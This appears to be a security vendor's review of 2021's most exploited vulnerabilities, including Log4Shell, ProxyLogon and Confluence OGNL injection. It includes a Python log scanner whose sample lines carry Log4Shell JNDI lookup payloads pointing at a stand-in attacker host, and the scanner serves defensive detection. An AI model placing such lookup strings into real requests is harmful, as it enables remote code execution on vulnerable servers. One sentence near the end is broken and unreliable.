High Profile Global Vulnerabilities

The following list of top vulnerabilities is based on data collected by the Check Point Intrusion Prevention System (IPS) sensor net and details some of the most popular and interesting attack techniques and exploits observed by Check Point researchers in 2021.

‘Log4Shell’ Apache Log4j - Remote Code Execution (CVE-2021-44228)

Apache Log4j is an open-source Java-based logging package provided by the Apache Software Foundation as part of the Apache Logging Services. It is the most popular Java logging library, used by millions of Java-based applications worldwide to record activities such as routine system operations and error messages and to send diagnostics to system admins. On December 9, 2021, the Apache Foundation released an emergency Log4j version to address a critical flaw in the logging framework. The flaw enables threat actors to compromise a machine by sending it a simple string such as '${jndi:ldap://attacker_server/path}' as part of the HTTP request, the User-Agent header or any other input likely to be logged by the server using Log4j. By controlling the messages logged via the logging package, an attacker could have arbitrary code executed from a remote server. Called ‘Log4Shell’, the vulnerability took the security community by storm due to its far-reaching effects on millions of companies that use Log4j, including Cisco, Twitter, Cloudflare, Tesla, Amazon and Apple. Widespread exploitation of the flaw was observed almost immediately, both by low-skilled attackers distributing cryptominers and by state-sponsored APT groups seeking access to corporate networks. According to Check Point Research, approximately 48.3% of organizations were affected by exploitation attempts of the Log4Shell vulnerability in 2021.
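The report describes the trigger as a lookup string placed in any input the server logs. The following is an added detection example (not Check Point's code or tooling) that scans web-server access-log lines for that lookup shape, percent-decoding first because the string often arrives URL-encoded in a query string, and extracts the scheme and host of each lookup for triage. The log lines and the host name attacker_server are constructed for the example; the regular expression only covers the literal '${jndi:...' form the report quotes.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines in the common web-server access-log layout (made up
# for this example, not real traffic). The lookup strings use the same
# '${jndi:ldap://attacker_server/path}' shape quoted in the report; line 3 carries
# it URL-encoded in the query string, line 4 in mixed case with an explicit port.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:12:51 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker_server/path}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:02 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker_server%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [10/Dec/2021:03:14:10 +0000] "POST /login HTTP/1.1" 302 0 "-" "${JNDI:ldaps://attacker_server:1389/o}"',
]

# A JNDI lookup in the form Log4j resolves it: '${', the 'jndi' prefix, a scheme,
# '://' and a host. Case-insensitive because Log4j's prefix matching is.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^/\s}:]+)",
    re.IGNORECASE,
)


def normalise(line: str) -> str:
    """Percent-decode a log line (twice, to catch double-encoded query strings)
    so the lookup text is compared in the form Log4j would eventually see."""
    for _ in range(2):
        line = unquote(line)
    return line


def scan_line(line_no: int, line: str) -> Optional[Dict[str, object]]:
    """Return a finding for the first JNDI lookup in a line, or None."""
    match = JNDI_LOOKUP.search(normalise(line))
    if match is None:
        return None
    return {
        "line_no": line_no,
        "scheme": match.group("scheme").lower(),
        "host": match.group("host"),
        "raw": line,
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan every line and collect findings, numbering lines from 1."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        finding = scan_line(line_no, line)
        if finding is not None:
            findings.append(finding)
    return findings


def lookup_hosts(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct hosts the lookups point at: the set to check outbound
    LDAP/RMI connection logs and egress firewall rules against during triage."""
    return sorted({str(f["host"]) for f in findings})


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG_LINES)
    for f in results:
        print(f"line {f['line_no']}: {f['scheme']}://{f['host']}")
    print("hosts to investigate:", lookup_hosts(results))
```

A match in an access log only shows that a lookup string reached the server; whether the vulnerable Log4j version actually logged that field and made the outbound connection is answered by the application's own logs and egress records for the extracted hosts. Scanning inputs this way is a detection aid for incident response, not a substitute for upgrading Log4j, and obfuscated lookups or inputs logged outside the web tier need broader coverage than this single pattern.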


“ProxyLogon” Microsoft Exchange Server - Authentication Bypass (CVE-2021-26855)

ProxyLogon is the name given by researchers from DEVCORE to an authentication bypass vulnerability (CVE-2021-26855) first discovered and reported in late 2020. When chained with other vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), it can lead to remote code execution on any unpatched mainstream Exchange Server. ProxyLogon has been exploited in the wild by several APT groups. In August, Earth Baku launched a campaign in the Indo-Pacific region using SQL injection and ProxyLogon exploitation as entry vectors. In September, the FamousSparrow cyberespionage group exploited the flaw and deployed its SparrowDoor backdoor against hotel chains, governments, private businesses and various other sectors worldwide. Another threat group, SquirrelWaffle, was seen compromising Microsoft Exchange servers with ProxyShell and ProxyLogon to spread malware through malicious emails.


Atlassian Confluence - Remote Code Execution (CVE-2021-26084)

This critical Remote Code Execution flaw in Atlassian Confluence Server and Confluence Data Center, made public in August 2021, stems from an injection in the Object Graph Navigation Language (OGNL) expressions that Confluence evaluates. It can be exploited without authentication, allowing a remote attacker to execute arbitrary code on the affected system. Atlassian released patches for the affected products, and several proof-of-concept exploits were published. Threat actors subsequently scanned for the vulnerability with the aim of installing cryptominers. In September, the z0Miner cryptojacker attempted to conduct mining operations on vulnerable machines. In October, the Atom Silo ransomware operator was observed exploiting unpatched servers to launch ransomware attacks.


Many vulnerabilities discovered in 2017 maintained a strong presence throughout 2021. This is mostly due to popular flaws like the Apache Struts2 Remote Code Execution (CVE-2017-5638), which is incorporated into the Mirai botnet, or the PHPUnit remote code execution (CVE-2017-9841), often used to exploit vulnerable WordPress plugins.

The 2020 vulnerabilities remained prominent, leveraged in 11% of attacks. Among the most significant was the Draytek Vigor series buffer overflow vulnerabilities (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828), which had a 41% share of global impact on organizations. These vulnerabilities could be leveraged to run arbitrary code on vulnerable Draytek routers, using a specially crafted remote HTTP request.

Figure: Percentage of attacks leveraging vulnerabilities by disclosure year in 2021

Hackers from the middle of the year, corresponding with a slight decrease in the use of CVEs from 2017.

Figure: Percentage of attacks leveraging vulnerabilities by disclosure year per month
